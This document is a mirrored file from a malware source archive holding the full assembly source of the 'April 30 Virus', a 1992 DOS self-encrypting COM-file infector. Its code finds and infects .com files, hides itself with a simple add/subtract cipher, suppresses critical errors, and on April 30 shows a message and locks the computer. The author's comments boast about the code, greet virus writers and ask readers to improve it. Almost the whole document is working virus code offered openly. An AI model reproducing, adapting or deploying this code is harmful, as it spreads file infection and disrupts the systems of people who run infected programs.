mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
255 lines
12 KiB
NASM
255 lines
12 KiB
NASM
|
;******************************************************************************
|
|||
|
;* Written in *
|
|||
|
;* April 30 Virus - Strain A A86 V3.22 *
|
|||
|
;* ---------- *
|
|||
|
;******************************************************************************
|
|||
|
;* "NightBird goes, *
|
|||
|
;* Along with the Queen..." *
|
|||
|
;******************************************************************************
|
|||
|
; Your are now looking at the result of my very first attempt to code
|
|||
|
; a Virus. This virus is a non-Resident Self- encrypting Direct Action
|
|||
|
; Com Infecter, which doesn't infect Command.com. The Virus is only active
|
|||
|
; on April 30, showing the Message and Hanging the System.....
|
|||
|
; You can recognize an infected File simply, the 4th Byte is a 'N'ightBird.
|
|||
|
;
|
|||
|
; Disclaimer: The Author will not be held responsible for any actions
|
|||
|
; caused by this Virus.
|
|||
|
;
|
|||
|
; Note: Don't just say: " another booring virus.. ", instead
|
|||
|
; be a teaching aid, and search for my pitfalls, (ofcoz
|
|||
|
; if there are any!), so I can improve my code....
|
|||
|
; Please do so.....
|
|||
|
;
|
|||
|
; Enough of that crap talk,
|
|||
|
; Greetingz go to... : John Tardy / TridenT and all other Members..
|
|||
|
; : Serge of (Ex) House Designs
|
|||
|
; : All Virus-Writers around the globe
|
|||
|
;
|
|||
|
; Well that's it for now.....
|
|||
|
;
|
|||
|
; C U & Have pHun,
|
|||
|
; (c) NightBird Dec. 1992.
|
|||
|
|
|||
|
|
|||
|
org 100h ; Produce a Com File
|
|||
|
|
|||
|
Start: jmp Prog ;
|
|||
|
db 'N' ; Virus ID
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Prog: Push ax ; Save Possible Errors
|
|||
|
call Main ; Get Virus
|
|||
|
Main: pop bp ; Offset
|
|||
|
sub bp,offset Main ; IP = BP
|
|||
|
|
|||
|
lea si,Restore[bp] ;
|
|||
|
mov di,si ;
|
|||
|
mov cx,CrypterLen ; Decrypt
|
|||
|
Decrypt: lodsb ; the
|
|||
|
Key: Add al,0 ; Virus
|
|||
|
stosb ;
|
|||
|
loop Decrypt ;
|
|||
|
|
|||
|
Decryptlen equ $-Prog ;
|
|||
|
|
|||
|
|
|||
|
Restore: lea si,[bp+Restore_Host] ; Restore
|
|||
|
mov di,100h ; the Original
|
|||
|
movsw ; 4 Bytes of the
|
|||
|
movsw ; Host Program
|
|||
|
|
|||
|
mov ah,2ah ; Is it
|
|||
|
int 21h ; the 30 of
|
|||
|
cmp dh,4 ; April?
|
|||
|
jne Start_Virus ; Yes, Show Txt
|
|||
|
cmp dl,30 ; No, Continue
|
|||
|
jne Start_Virus ; with Start_Virus
|
|||
|
|
|||
|
mov ah,09h ;
|
|||
|
lea dx,Txt[bp] ; Show Txt
|
|||
|
int 21h ; And lock
|
|||
|
HyperSpace: cli ; the Computer
|
|||
|
jmp HyperSpace ;
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Start_Virus: mov ax,3524h ; Get Adress of
|
|||
|
int 21h ; Interrupt 24h
|
|||
|
|
|||
|
lea Oldint24h[bp],es ; Store
|
|||
|
lea Oldint24h+2[bp],bx ; them...
|
|||
|
|
|||
|
push cs ; Cs = Es
|
|||
|
pop es ; Register
|
|||
|
|
|||
|
mov ax,2524h ; Install a new
|
|||
|
lea dx,Newint24h ; Int. to suppres
|
|||
|
int 21h ; Errors..
|
|||
|
|
|||
|
mov ah,1ah ; Move DTA
|
|||
|
mov dx,dta ; to a save
|
|||
|
int 21h ; place
|
|||
|
|
|||
|
mov ah,4eh ;
|
|||
|
Search: lea dx,[bp+Filespec] ; Search
|
|||
|
xor cx,cx ; for a com file, and
|
|||
|
int 21h ; and quit if error
|
|||
|
jnc Found ;
|
|||
|
jmp End_Virus ;
|
|||
|
|
|||
|
Found: cmp word ptr [bp+offset dta+35],'DN' ; Check If Command.com
|
|||
|
je Find_Next_one ;
|
|||
|
|
|||
|
mov ax,4300h ; Fetch file
|
|||
|
mov dx,dta+1eh ; Attribute
|
|||
|
int 21h ; and store it
|
|||
|
push cx ; on stack
|
|||
|
|
|||
|
mov ax,4301h ; Set attribute
|
|||
|
mov cx,cx ; for use
|
|||
|
int 21h ;
|
|||
|
|
|||
|
mov ax,3d02h ; Open file
|
|||
|
int 21h ; Dx = 0fd1eh
|
|||
|
xchg ax,bx ; BX = FileHandle
|
|||
|
|
|||
|
mov ax,5700h ; Get file/date
|
|||
|
int 21h ; format and
|
|||
|
push cx ; store them
|
|||
|
push dx ; on stack
|
|||
|
|
|||
|
mov ah,3fh ; Read 4 Bytes
|
|||
|
lea dx,[bp+Restore_Host] ; and save
|
|||
|
mov cx,4 ; them..
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,[Restore_Host+bp] ; Check
|
|||
|
cmp ax,'MZ' ; if it is
|
|||
|
je Exit ; a renamed
|
|||
|
cmp ax,'ZM' ; Exe-File
|
|||
|
je exit ;
|
|||
|
|
|||
|
mov ah,[bp+Restore_Host+3] ; Check if Already
|
|||
|
cmp ah,'N' ; infected
|
|||
|
jne Infect
|
|||
|
; Jump to Sub-Routine
|
|||
|
Exit: Call Close
|
|||
|
|
|||
|
Find_Next_one: mov ah,4fh ; Try Another
|
|||
|
jmp Search ; file...
|
|||
|
|
|||
|
Infect: mov ax,4202h ; Move File
|
|||
|
xor cx,cx ; Pointer to
|
|||
|
xor dx,dx ; the End of
|
|||
|
int 21h ; the File
|
|||
|
|
|||
|
cmp ax,0fb00h ; File too
|
|||
|
jae Exit ; Big
|
|||
|
|
|||
|
cmp ax,Minlen ; File too
|
|||
|
jbe Exit ; Short
|
|||
|
|
|||
|
sub ax,3 ; Save Jmp
|
|||
|
mov word ptr [bp+Jmp_to_Virus]+1,ax ;
|
|||
|
|
|||
|
Zero: mov ah,2ch ; (If the key
|
|||
|
int 21h ; is 0,go Zero)
|
|||
|
cmp dl,0 ;
|
|||
|
jne Continue ; Get Seconds
|
|||
|
jmp Zero ; to save as
|
|||
|
Continue: mov key+1[bp],dl ; Decrypter-Key
|
|||
|
lea si,[Prog+bp] ;
|
|||
|
mov di,0fd00h ; Move the
|
|||
|
mov cx,Decryptlen ; Decrypter
|
|||
|
rep movsb ; Part
|
|||
|
|
|||
|
lea si,Restore[bp] ;
|
|||
|
mov cx,Crypterlen ; Decrypt behind
|
|||
|
Encrypt: lodsb ; the
|
|||
|
Sub al,dl ; Decrypter
|
|||
|
stosb ;
|
|||
|
loop encrypt ;
|
|||
|
|
|||
|
mov ah,40h ; Write Virus
|
|||
|
lea dx,0fd00h ; at the end
|
|||
|
mov cx,virlen ; of the file!
|
|||
|
int 21h ;
|
|||
|
|
|||
|
mov ax,4200h ; Move File
|
|||
|
xor cx,cx ; Pointer to
|
|||
|
xor dx,dx ; the start of
|
|||
|
int 21h ; the file
|
|||
|
|
|||
|
mov ah,40h ; Write Virus-Jmp
|
|||
|
lea dx,Jmp_to_Virus[bp] ; to the begin
|
|||
|
mov cx,4 ; of the file
|
|||
|
int 21h ;
|
|||
|
|
|||
|
call close ; Jump to Sub-Routine
|
|||
|
|
|||
|
|
|||
|
|
|||
|
End_Virus: mov ax,2524h ;
|
|||
|
lea bx,Oldint24h[bp] ; Restore Old
|
|||
|
mov ds,bx ; (Critical Error)
|
|||
|
lea dx,Oldint24h+2[bp] ; Interrupt 24h
|
|||
|
int 21h ;
|
|||
|
|
|||
|
push cs ; Cs = Ds
|
|||
|
pop ds ; Register
|
|||
|
|
|||
|
mov ah,1ah ;
|
|||
|
mov dx,80h ;
|
|||
|
int 21h ; Restore DTA
|
|||
|
pop ax ; and go back
|
|||
|
mov di,100h ; to the Host
|
|||
|
push di ; Program
|
|||
|
ret ;
|
|||
|
|
|||
|
|
|||
|
Close: pop si ; Fetch IP from Stack
|
|||
|
pop dx ;
|
|||
|
pop cx ; Restore
|
|||
|
mov ax,5701h ; Date/Time
|
|||
|
int 21h ;
|
|||
|
|
|||
|
mov ah,3eh ; Close
|
|||
|
int 21h ; File
|
|||
|
|
|||
|
mov ax,4301h ;
|
|||
|
pop cx ; Restore File
|
|||
|
mov dx,dta+1eh ; Attributes
|
|||
|
int 21h ;
|
|||
|
push si ; Restores IP
|
|||
|
ret ;
|
|||
|
|
|||
|
Newint24h: mov al,3 ; Suppres Errors
|
|||
|
iret ; & Go back
|
|||
|
|
|||
|
Oldint24h dd 0
|
|||
|
|
|||
|
Restore_Host db 0cdh,20h,0,0
|
|||
|
|
|||
|
Jmp_to_Virus db 0e9h,0,0,'N'
|
|||
|
|
|||
|
Filespec db '*.com',0
|
|||
|
|
|||
|
Txt db 13,10,9,9,'"NightBird goes,',10,'Along with the Queen..."',13,10,7,'$'
|
|||
|
|
|||
|
Names db '*April 30 Virus*'
|
|||
|
|
|||
|
Dta equ 0fc00h
|
|||
|
|
|||
|
Crypterlen equ $-Restore
|
|||
|
|
|||
|
Virlen equ $-Prog
|
|||
|
|
|||
|
Minlen equ Virlen*2
|
|||
|
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|